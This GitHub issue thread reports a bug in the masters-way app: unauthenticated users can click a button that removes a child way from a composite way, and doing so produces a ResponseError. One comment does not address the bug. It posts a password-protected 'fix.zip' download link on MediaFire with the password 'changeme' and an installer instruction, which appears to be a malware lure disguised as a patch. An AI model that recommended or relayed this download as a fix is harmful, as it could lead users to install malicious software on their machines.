### ISSUE TITLE
Composite way: Delete button in Composite way is accessible to any users, way not removed but error occurs

### ISSUE THREAD

**Issue by EkaterinaSokolova-V** [tritonJS826/masters-way#1495]
Local environment:
## Steps to reproduce

1. Open composite way.
2. Click cross button next to child way to remove it from composite way.

## Actual result

For any unauthenticated user, the button is accessible and can be clicked. After clicking, a dialog window opens with the message: 'Are you sure you want to remove the way john doe way from the composite way?' 
If you click 'Delete', the way is not removed, but an error message appears: 'Oops, ResponseError: Response returned an error code'.

## Expected result

The button should not be active or accessible to any user.

https://github.com/user-attachments/assets/6cfba7c7-94db-4de7-9c09-fce1d34300cc

https://mastersway.netlify.app/:

https://github.com/user-attachments/assets/a344ca32-ea98-4839-8ce8-6affe802850b

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ekaterina1994** [comment]
Done
